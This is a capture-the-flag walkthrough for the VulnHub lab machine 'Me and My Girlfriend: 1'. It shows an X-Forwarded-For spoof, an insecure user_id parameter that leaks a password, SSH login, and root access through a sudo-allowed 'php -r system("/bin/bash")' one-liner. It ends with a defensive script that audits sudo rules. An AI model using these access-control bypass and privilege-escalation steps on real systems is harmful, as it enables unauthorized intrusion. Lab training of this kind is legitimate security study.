VulnHub ME AND MY GIRLFRIEND: 1 writeup

Download: https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/

flag1

X-Forwarded-For (XFF) bypass

x-forwarded-for:127.0.0.1

Registering admin succeeds. Clicking Profile reveals an id parameter, and visiting index.php?page=profile&user_id=5 shows alice's password, 4lic3.
Log in over SSH to find flag1.

❯ ssh alice@192.168.231.21
The authenticity of host '192.168.231.21 (192.168.231.21)' can't be established.
ECDSA key fingerprint is SHA256:lE5D8AvkJqcIwHiNuI9aSnC3ohlDrhPhjDljqSDy9sY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.231.21' (ECDSA) to the list of known hosts.
alice@192.168.231.21's password:
Last login: Fri Dec 13 14:48:25 2019
alice@gfriEND:~$ ls -la
total 32
drwxr-xr-x 4 alice alice 4096 Dec 13 2019 .
drwxr-xr-x 6 root root 4096 Dec 13 2019 ..
-rw------- 1 alice alice 10 Dec 13 2019 .bash_history
-rw-r--r-- 1 alice alice 220 Dec 13 2019 .bash_logout
-rw-r--r-- 1 alice alice 3637 Dec 13 2019 .bashrc
drwx------ 2 alice alice 4096 Dec 13 2019 .cache
drwxrwxr-x 2 alice alice 4096 Dec 13 2019 .my_secret
-rw-r--r-- 1 alice alice 675 Dec 13 2019 .profile
alice@gfriEND:~$ cd .my_secret/
alice@gfriEND:~/.my_secret$ ls -la
total 16
drwxrwxr-x 2 alice alice 4096 Dec 13 2019 .
drwxr-xr-x 4 alice alice 4096 Dec 13 2019 ..
-rw-r--r-- 1 root root 306 Dec 13 2019 flag1.txt
-rw-rw-r-- 1 alice alice 119 Dec 13 2019 my_notes.txt
alice@gfriEND:~/.my_secret$ cat flag1.txt
Greattttt my brother! You saw the Alice's note! Now you save the record information to give to bob! I know if it's given to him then Bob will be hurt but this is better than Bob cheated!

Now your last job is get access to the root and read the flag ^_^

Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}

flag2

Checking alice's privileges shows she can run php through sudo, so commands can be injected via PHP.

alice@gfriEND:~/.my_secret$ sudo -l
Matching Defaults entries for alice on gfriEND:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alice may run the following commands on gfriEND:
(root) NOPASSWD: /usr/bin/php
alice@gfriEND:~/.my_secret$ sudo php -r 'system("/bin/bash");'
root@gfriEND:~/.my_secret# cd /
root@gfriEND:/# find / -name flag2.txt
/root/flag2.txt
root@gfriEND:/# cat /root/flag2.txt

________ __ ___________.__ ___________.__ ._.
/ _____/ _____/ |_ \__ ___/| |__ ____ \_ _____/| | _____ ____| |
/ \ ___ / _ \ __\ | | | | \_/ __ \ | __) | | \__ \ / ___\ |
\ \_\ ( <_> ) | | | | Y \ ___/ | \ | |__/ __ \_/ /_/ >|
\______ /\____/|__| |____| |___| /\___ > \___ / |____(____ /\___ /__
\/ \/ \/ \/ \//_____/ \/

Yeaaahhhh!! You have successfully hacked this company server! I hope you who have just learned can get new knowledge from here :) I really hope you guys give me feedback for this challenge whether you like it or not because it can be a reference for me to be even better! I hope this can continue :)

Contact me if you want to contribute / give me feedback / share your writeup!
Twitter: @makegreatagain_
Instagram: @aldodimas73

Thanks! Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}
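
The sudo -l output in the flag2 section is the misconfiguration that gives root: a NOPASSWD rule for an interpreter is equivalent to a root shell. As an added example (not part of the original writeup), this audit parses sudo -l output and flags rules that let a user run a code-executing program as root; the CODE_RUNNERS list and the name audit_sudo_l are assumptions made for illustration.

```python
import os
import re

# Assumption: a short, non-exhaustive list of programs that run arbitrary
# code by design, so a sudo grant for them equals a root shell.
CODE_RUNNERS = {"php", "python", "perl", "ruby", "lua", "node",
                "bash", "sh", "dash", "zsh", "awk", "gawk"}

# "(runas) TAG: TAG: command, command" as printed by sudo -l
RULE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(\S.*)$")

# The sudo -l output from this writeup, used as sample input.
SAMPLE = r"""Matching Defaults entries for alice on gfriEND:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alice may run the following commands on gfriEND:
    (root) NOPASSWD: /usr/bin/php
"""

def audit_sudo_l(text):
    """Return findings for rules that let a user run code as root."""
    findings = []
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # Defaults lines, headers and blanks are not rules
        runas, tags, cmds = m.groups()
        users = {u.strip() for u in runas.split(":")[0].split(",")}
        if not users & {"root", "ALL"}:
            continue  # rule does not grant root
        nopasswd = "NOPASSWD:" in tags.split()
        # sudo escapes literal commas inside arguments as "\,"
        for cmd in filter(None, re.split(r"(?<!\\),\s*", cmds.strip())):
            path = cmd.split()[0]
            # php7.0, python3.8 -> php, python
            name = re.sub(r"[\d.]+$", "", os.path.basename(path))
            if path == "ALL" or name in CODE_RUNNERS:
                findings.append({"command": cmd, "nopasswd": nopasswd,
                                 "reason": "unrestricted" if path == "ALL"
                                 else "runs arbitrary code as root"})
    return findings

if __name__ == "__main__":
    for finding in audit_sudo_l(SAMPLE):
        print(finding)
```

Feed it the output of sudo -l -U <user> collected per account; any finding with nopasswd set is the case shown in this writeup and should be replaced with a narrowly scoped command or removed.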